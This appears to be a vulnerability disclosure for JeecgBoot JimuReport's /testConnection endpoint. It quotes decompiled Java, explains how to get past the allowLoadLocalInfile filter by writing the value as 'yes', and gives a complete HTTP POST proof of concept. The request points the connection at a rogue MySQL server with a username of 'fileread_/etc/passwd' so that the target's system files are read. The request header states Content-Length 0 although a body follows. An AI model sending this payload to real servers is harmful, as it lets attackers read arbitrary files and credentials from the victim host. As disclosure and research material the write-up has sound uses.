In the /testConnection route, the caller supplies the MySQL connection parameters, and a crafted connection can be used to read arbitrary files.
@PostMapping({"/testConnection"})
public Result a(@RequestBody JmreportDynamicDataSourceVo var1) {
Connection var2 = null;
String var3 = var1.toString();
a.info(" local cache key: " + var3);
Object var4 = this.localCache.a(var3);
if (g.d(var4)) {
int var5 = g.e(var4);
a.info(" local cache value: " + var5);
if (var5 >= 3) {
return Result.error("数据源已连接错误3次以上,请检查配置信息!");
}
if (var5 == 0) {
return Result.OK("数据库连接成功", true);
}
} else {
this.localCache.a(var3, 0, 3600000L);
}
try {
Result var6;
try {
String var37 = var1.getDbType();
Result var40;
if (this.jmReportDbSourceService.isHave(d.cI, var37)) {
boolean var39 = this.jmreportNoSqlService.testConnection(var1);
if (var39) {
var40 = Result.OK("数据库连接成功", true);
return var40;
} else {
this.localCache.a(var3, 1);
var40 = Result.error("数据库连接失败:错误未知");
return var40;
}
} else {
Class.forName(var1.getDbDriver());
DriverManager.setLoginTimeout(60);
String var38 = org.jeecg.modules.jmreport.dyndb.util.b.g(var1.getDbUrl());
var2 = DriverManager.getConnection(var38, var1.getDbUsername(), var1.getDbPassword());
if (var2 == null) {
this.localCache.a(var3, 1);
var40 = Result.OK("数据库连接失败:错误未知", true);
return var40;
There is a protective check applied while the JDBC URL is parsed.
public static String g(String var0) {
if (a(var0, "mysql")) {
if (var0.indexOf("allowLoadLocalInfile") > 0) {
var0 = var0.replaceAll("(?i)allowLoadLocalInfile=true", "allowLoadLocalInfile=false");
} else {
var0 = var0 + "&allowLoadLocalInfile=false";
}
}
This check can be bypassed: the replacement only matches the literal value `true`, and since the parameter name is already present no `&allowLoadLocalInfile=false` is appended, so a URL that spells the value differently passes through unchanged.
POST /jeecg-boot/jmreport/testConnection HTTP/1.1
Host: 127.0.0.1:8080
Content-Length: 0
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
{
"id":"1",
"code":"select * from information_schema.tables",
"dbType":"jndi",
"dbDriver":"com.mysql.cj.jdbc.Driver",
"dbUrl":"jdbc:mysql://localhost:3307/test?allowLoadLocalInfile=yes",
"dbName":"information_schema",
"dbUsername":"fileread_/etc/passwd",
"dbPassword":"password",
"connectionTimaes":"5"
}